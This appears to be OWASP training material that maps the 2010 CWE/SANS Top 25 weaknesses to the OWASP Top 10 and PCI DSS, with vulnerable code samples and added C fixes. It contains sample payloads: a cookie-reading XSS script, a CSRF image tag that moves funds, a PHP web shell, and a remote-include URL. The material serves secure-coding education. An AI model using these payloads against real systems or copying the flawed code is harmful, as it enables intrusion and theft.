OWASP Education Computer Based Training
2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping
Keith Turpin, The Boeing Company; OWASP Secure Coding Practices Lead; OWASP Global Projects Committee; keith.turpin@owasp.org
Nishi Kumar, IT Architect Specialist, FIS; OWASP CBT Project Lead; OWASP Global Industry Committee; Nishi.Kumar@owasp.org
Objectives • Provide an overview of the 2010 CWE/SANS Top 25 • Discuss mapping relationships between CWE/SANS Top 25, OWASP Top 10 for 2010 and PCI DSS V2 • Understand the CWE/SANS Top 25 weaknesses and how to remediate them
Organizations • MITRE - http://www.mitre.org/ The MITRE Corporation is a not-for-profit organization that manages several Federally Funded Research and Development Centers. MITRE currently runs various IT security projects including the Common Weakness Enumeration (CWE) and it is the official source for the CWE/SANS Top 25 Most Dangerous Software Errors. CWE Database - http://cwe.mitre.org/ • SANS - http://www.sans.org The SysAdmin, Audit, Network, Security (SANS) Institute operates as a commercial research and education company. SANS is well known for its Internet Storm Center, its comprehensive list of computing security training programs and its work with MITRE on the CWE/SANS Top 25 Most Dangerous Software Errors.
Selection and Ranking • Builds on the original 2009 version • Methodology - Qualitative rather than quantitative • Factors in ranking - Prevalence and Severity • Initially started with 41 candidate weaknesses
Mapping Considerations • The SANS CWE Top 25 is only a fraction of the full CWE list of weaknesses • The SANS CWE Top 25 targets both web and non-web applications • OWASP defines ten risks focused on web applications • OWASP's list tends to have broader weaknesses, each made up of several specific vulnerabilities • PCI DSS requirements point to both as industry best practices
[1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Try this in your browser: <script>javascript:alert(document.cookie)</script>
[1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') E.g. output encoding: < becomes &lt;, > becomes &gt;, & becomes &amp; and " becomes &quot;, so <script> -> &lt;script&gt; (rendered as text, not markup)
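The output-encoding rule on this slide written out as a C function (an added example, not code from the OWASP deck): each character with HTML meaning is replaced by its entity before the value is placed in a page, and the function reports the required length so a too-small buffer is detected rather than silently truncated.

```c
/* Added example (not from the OWASP deck): HTML output encoding for the four
 * characters the slide lists (< > & "). Untrusted text encoded this way is
 * rendered by the browser as text instead of being parsed as markup. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Encode src into dst (capacity cap bytes). Returns the length the encoded
 * form needs (excluding the NUL); a return value >= cap means dst was too
 * small and only a prefix was written, so the caller must not emit it. */
size_t html_encode(const char *src, char *dst, size_t cap)
{
    size_t out = 0;       /* length the full encoding needs */
    size_t written = 0;   /* bytes actually stored in dst */
    for (; *src; src++) {
        const char *rep;
        switch (*src) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        default:   rep = NULL;     break;
        }
        size_t len = rep ? strlen(rep) : 1;
        if (out + len < cap) {        /* room for this piece plus the NUL */
            if (rep)
                memcpy(dst + out, rep, len);
            else
                dst[out] = *src;
            written = out + len;
        }
        out += len;                   /* keep counting even when truncating */
    }
    if (cap)
        dst[written] = '\0';
    return out;
}

int main(void)
{
    char page[128];
    /* constructed input of the kind the slide shows */
    html_encode("<script>alert(document.cookie)</script>", page, sizeof page);
    puts(page);   /* prints &lt;script&gt;alert(document.cookie)&lt;/script&gt; */
    return 0;
}
```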
[2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Example: C
  char last_name[20];                  /* declare array with 20 character limit */
  printf("Enter your last name: ");
  scanf("%s", last_name);              /* get input (no limit) and store in array */
The software does not limit the size of the name entered by the user, so an entry of more than 20 characters will cause a buffer overflow, since the "last_name" array can only hold 20 characters
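The bounded version of the read above, as an added example (not code from the OWASP deck): the scanf width is derived from the buffer size so the copy can never exceed it, and the helper reports truncation so the caller can reject an over-long name instead of silently keeping a cut-off one. The input string stands in for the stdin line a real program would read.

```c
/* Added example (not from the OWASP deck): scanf("%s") with no width writes
 * past last_name. A width of cap-1 bounds the copy; the helper also reports
 * whether the typed token was longer than the buffer allows. */
#include <stdio.h>
#include <string.h>

#define NAME_CAP 20   /* same 20-character buffer as on the slide */

/* Parse the first whitespace-delimited token of `input` into dst, which holds
 * at most cap-1 characters plus the NUL. Returns 1 if the whole token fit,
 * 0 if it was truncated to cap-1 characters, -1 if no token was present. */
int read_last_name(const char *input, char *dst, size_t cap)
{
    char fmt[16];
    if (cap < 2)
        return -1;
    /* Build "%19s" (for cap == 20) from the buffer size so width and
     * buffer can never drift apart when one of them is changed. */
    snprintf(fmt, sizeof fmt, "%%%zus", cap - 1);
    if (sscanf(input, fmt, dst) != 1)
        return -1;
    /* Length of the token the user actually typed, for the truncation check */
    size_t typed = strcspn(input + strspn(input, " \t\n"), " \t\n");
    return strlen(dst) == typed ? 1 : 0;
}

int main(void)
{
    char last_name[NAME_CAP];
    /* constructed inputs: one that fits and one that would have overflowed */
    const char *ok  = "Turpin\n";
    const char *bad = "Wolfeschlegelsteinhausenbergerdorff\n";
    printf("%d %s\n", read_last_name(ok, last_name, sizeof last_name), last_name);
    printf("%d %s\n", read_last_name(bad, last_name, sizeof last_name), last_name);
    return 0;
}
```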
[4] CWE-352 Cross-Site Request Forgery (CSRF)
Example of a legitimate request:
  http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
Example of a forged request using a hidden image tag:
  <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
[6] CWE-807 Reliance on Untrusted Inputs in a Security Decision
[7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[8] CWE-434 Unrestricted Upload of File with Dangerous Type
Example: PHP
  <?php system($_GET['cmd']); ?>
[9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
Example: PHP
  $dir = $_GET['module_name'];
  include($dir . "/function.php");
Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com
[14] CWE-129 Improper Validation of Array Index
Example: Java
  public String getValue(int index) {
      return array[index];
  }
If index is outside of the range of the array, this may result in an ArrayIndexOutOfBoundsException being raised
[15] CWE-754 Improper Check for Unusual or Exceptional Condition
Example: Java (bad code)
  String itemName = request.getParameter(ITEM_NAME);
  if (itemName.compareTo(IMPORTANT_ITEM) == 0) {
      ...
  }
The code does not check whether the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a null dereference.
[16] CWE-209 Information Exposure Through an Error Message
Example: Java
  try {
      /* ... */
  } catch (Exception e) {
      System.out.println(e);
  }
If this output is redirected to a web user, this may represent a security problem.
In this example, sensitive information might be printed depending on the exception that occurs. If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information.
[17] CWE-190 Integer Overflow or Wraparound
Example: C
  nresp = packet_get_int();
  if (nresp > 0) {
      response = xmalloc(nresp*sizeof(char*));
      for (i = 0; i < nresp; i++)
          response[i] = packet_get_string(NULL);
  }
If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0, causing the subsequent loop iterations to overflow the heap buffer response
[18] CWE-131 Incorrect Calculation of Buffer Size
Example: C
  int *id_sequence;
  id_sequence = (int*) malloc(3);
  if (id_sequence == NULL) exit(1);
  id_sequence[0] = 13579;
  id_sequence[1] = 24680;
  id_sequence[2] = 97531;
The size parameter used during the malloc() call is set to '3', which results in a buffer of 3 bytes. The intent was to create a buffer that holds three ints, and in C, each int requires 4 bytes, so an array of 12 bytes is needed. Executing the above code could result in a buffer overflow, as 12 bytes of data are being saved into 3 bytes worth of allocated space
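One allocation helper that addresses both the CWE-190 slide (nresp*sizeof(char*) wrapping to 0) and the CWE-131 slide (malloc(3) for three ints), as an added example that is not code from the OWASP deck: it takes element count and element size separately, computes the byte count from sizeof, and refuses the request when the product would wrap. u32_product() is a hypothetical helper that reproduces the slide's 32-bit arithmetic so the wrapped value can be seen on a 64-bit build.

```c
/* Added example (not from the OWASP deck). The two allocations on the slides
 * fail in opposite ways: one because count*size wraps (CWE-190), the other
 * because a bare byte count is passed instead of count*sizeof(element)
 * (CWE-131). checked_array_alloc() handles both cases. */
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

/* Hypothetical helper: the slide's arithmetic in 32-bit unsigned math.
 * 1073741824 * 4 wraps to 0, which is what xmalloc() received on a 32-bit
 * build. Unsigned wraparound is silent; nothing signals the error. */
uint32_t u32_product(uint32_t count, uint32_t elem_size)
{
    return count * elem_size;
}

/* Returns NULL when count*elem_size would exceed SIZE_MAX (or elem_size is 0,
 * or malloc fails), instead of handing malloc a wrapped, too-small size. */
void *checked_array_alloc(size_t count, size_t elem_size)
{
    if (elem_size == 0 || count > SIZE_MAX / elem_size)
        return NULL;   /* product would wrap: refuse rather than under-allocate */
    return malloc(count * elem_size);
}

int main(void)
{
    printf("%u\n", (unsigned)u32_product(1073741824u, 4));   /* 0: the wrapped size */

    /* CWE-190 fix: an untrusted count that cannot fit is rejected up front */
    char **response = checked_array_alloc(SIZE_MAX / 2, sizeof *response);
    printf("%s\n", response ? "allocated" : "rejected");      /* rejected */

    /* CWE-131 fix: three ints need 3*sizeof(int) bytes, not 3 bytes */
    int *id_sequence = checked_array_alloc(3, sizeof *id_sequence);
    if (id_sequence == NULL)
        return 1;
    id_sequence[0] = 13579;
    id_sequence[1] = 24680;
    id_sequence[2] = 97531;
    printf("%d\n", id_sequence[2]);
    free(id_sequence);
    return 0;
}
```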
[20] CWE-494 Download of Code Without Integrity Check
Example: Java
  URL[] classURLs = new URL[]{ new URL("file:subdir/") };
  URLClassLoader loader = new URLClassLoader(classURLs);
  Class loadedClass = Class.forName("loadMe", true, loader);
This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum.